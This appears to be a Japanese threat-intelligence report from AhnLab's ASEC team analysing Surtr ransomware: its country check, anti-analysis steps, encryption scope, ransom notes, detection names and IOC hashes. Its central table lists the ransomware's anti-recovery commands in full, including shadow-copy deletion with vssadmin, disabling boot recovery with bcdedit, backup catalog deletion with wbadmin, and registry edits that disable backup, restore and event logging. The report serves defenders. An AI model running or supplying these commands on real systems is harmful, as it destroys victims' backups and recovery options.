ASEC 分析チームは最近、内部モニタリングを通じてファイルを暗号化した後、原本ファイルの拡張子名に「[DycripterSupp@mailfence.com].[<ランダム文字列>].Surtr」を追加する Surtr ランサムウェアが配布されていることを確認した。
Surtr ランサムウェアに感染すると、[図1、2]のように感染した PC のデスクトップ背景を変更し、ランサムノートの生成によってユーザーにランサムウェアに感染した事実を注視させ、[図3]のように感染したファイルが存在するフォルダーごとにランサムノートファイル(SURTR_README.hta および SURTR_README.txt)を生成するといった特徴がある。
Surtr ランサムウェアは実際のファイル暗号化を実行する前、当該ファイルが実行される国の IP アドレスの確認、プロセスリストの確認およびサービス終了等のタスクを実行する特徴がある。
まず、このランサムウェアは IP 照会サービスである「ip-api.com」ソケットを通じてクエリを実行し、当該ファイルが実行される国の情報を照会する。その後、以下の図のように特定の国で実行される場合は、メッセージボックスの出力とともに実行を中止する。
その後、当該プロセスのデバッグ状態およびサンドボックスのチェックルーティンを実行したあと、ごみ箱に格納されたファイルを削除する振る舞いを実行し、ランサムウェア実行時に生成されるファイル、およびコピーされたランサムウェアファイルの保存に使用される以下のディレクトリを生成する。
- C:\ProgramData\Service
- %TEMP%\Service
さらに、当該システム内で実行中のサービスおよびプロセスをチェックして[図5、6]のようにファイル内で定義された文字列に該当するプロセス/サービスが実行中かどうかを確認するロジックが含まれている。
続いて以下のコマンドを実行し、以下のように定義されたすべてのドライブに対してボリュームシャドウコピーのサイズを再調整および削除し、復旧環境の無効化等によって感染後に元のファイルへ復旧させることを困難にしている。
| vssadmin resize shadowstorage /for= /on= /maxsize=401MB vssadmin resize shadowstorage /on= /maxsize=unbounded vssadmin.exe Delete Shadows /all /quiet bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy IgnoreAllFailures fsutil.exe usn deletejournal /D C: wbadmin.exe delete catalog -quiet schtasks.exe /Change /TN “Microsoft\Windows\SystemRestore\SR” /disable reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore” /v DisableConfig /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f |
続いてこのランサムウェアは[図7]のようにすべてのドライブにあるファイルのうち「surt」、「dll」、「exe」、「lnk」の拡張子を除くファイルに対して暗号化を実行し、[図8]のように特定パスのもとに位置するファイルについてはファイル暗号化の例外対象とする。
ファイルの暗号化を実行したあと、このランサムウェアは[図9]のようにランサムノートの生成、およびイベントログ削除等の追加の振る舞いを実行する特徴がある。
AhnLab V3 製品ではファイル検知、振る舞いベースの検知等を含め、様々な検知ポイントにより Surtr ランサムウェアを検知および対応している。ランサムウェア被害の予防のため、出どころが不明なファイルを実行する際は注意しなければならず、疑わしいファイルはセキュリティソフトによる検査を行い、アンチウイルスを最新版にアップデートしておく必要がある。このマルウェアについて、当社 V3 では以下の通り検知している。
[ファイル検知]
- Ransomware/Win.Generic.C5285743 (2022.10.25.02)
[ビヘイビア検知]
- Ransom/MDP.Nemty.M2599
[IOC 情報]
- ad539ebdf9e34e02be487134cf9a6713
- e31b96b8a74075935360b5e5a18926e9
- 674e7ee905d24a89af47b53b53ffc23c
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報